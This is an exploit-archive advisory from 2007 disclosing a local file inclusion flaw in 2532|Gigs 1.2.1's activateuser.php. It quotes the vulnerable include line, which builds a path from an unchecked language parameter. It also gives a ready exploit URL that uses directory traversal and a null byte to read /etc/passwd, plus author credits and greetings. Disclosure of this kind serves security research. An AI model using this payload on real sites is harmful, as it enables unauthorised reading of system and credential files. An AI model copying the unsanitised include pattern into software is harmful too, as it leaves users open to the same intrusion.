[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
# Published : 2007-08-26
# Author : bd0rk
# Previous Title : WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability
# Next Title : SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
Discovered by bd0rk || SOH-Crew
www.soh-crew.it.tt
The german Coding and IT-Security Ressource
-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ-กใ
Vendor: http://www.2532gigs.com
Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip
License: Free
Vulnerable Code: include_once("languages/$language/settings.php");
Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00
Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32
####The 18 years old, german Hacker bd0rk####
# www.Syue.com [2007-08-26]